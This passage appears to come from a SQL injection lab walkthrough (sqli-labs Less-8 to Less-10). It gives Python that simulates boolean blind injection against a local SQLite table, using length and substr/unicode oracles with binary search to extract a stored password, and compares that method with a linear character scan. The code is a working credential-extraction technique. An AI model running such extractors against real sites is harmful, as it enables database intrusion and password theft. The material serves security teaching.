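    """True iff the injected condition holds: stand-in for 'page length unchanged',
    'You are in...' present, or a sleep() delay observed."""
    global REQUESTS
    REQUESTS += 1
    # Same vulnerable shape as the labs: ... WHERE id='1' and <condition>--
    sql = "SELECT count(*) FROM users WHERE id='1' and %s" % condition
    return _CONN.execute(sql).fetchone()[0] == 1


def blind_length(subquery, max_len=64):
    """length((subquery)) by binary search over 0..max_len."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle("length((%s))>%d" % (subquery, mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_char(subquery, pos):
    """Code point of character `pos` (1-based) by binary search over 0..127.
    sqlite's unicode() stands in for MySQL's ascii()."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle("unicode(substr((%s),%d,1))>%d" % (subquery, pos, mid)):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def binary_extract(subquery):
    """Whole value: length search, then one code-point search per position."""
    n = blind_length(subquery)
    return "".join(blind_char(subquery, i) for i in range(1, n + 1))


def linear_extract(subquery, alphabet="abcdefghijklmnopqrstuvwxyz@-"):
    """The post's approach: one request per candidate character. A character
    outside `alphabet` is silently dropped (under MySQL's case-insensitive
    default collation an upper-case letter would instead come back folded to
    lower case; either way the scan loses information)."""
    n = blind_length(subquery)
    out = ""
    for i in range(1, n + 1):
        for ch in alphabet:
            if oracle("substr((%s),%d,1)='%s'" % (subquery, i, ch)):
                out += ch
                break
    return out


def compare(subquery):
    """Run both extractors on the same subquery.
    Returns (binary_value, binary_requests, linear_value, linear_requests)."""
    global REQUESTS
    REQUESTS = 0
    b = binary_extract(subquery)
    b_req = REQUESTS
    REQUESTS = 0
    l = linear_extract(subquery)
    return b, b_req, l, REQUESTS


if __name__ == "__main__":
    # Second row's password, the same target the Less-8 script dumps
    print(compare("select password from users limit 1,1"))
```

For the ten-character password 'I-kill-you' the binary search needs 6 requests for the length and 7 per character, 76 in total, and recovers the upper-case I; the alphabet scan needs well over a hundred requests and returns '-kill-you' because 'I' is not in its alphabet. With sleep(3) behind every request, that difference is what turns an ice-cream-length run into seconds.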

Less-10

Double quotes; otherwise the same as above.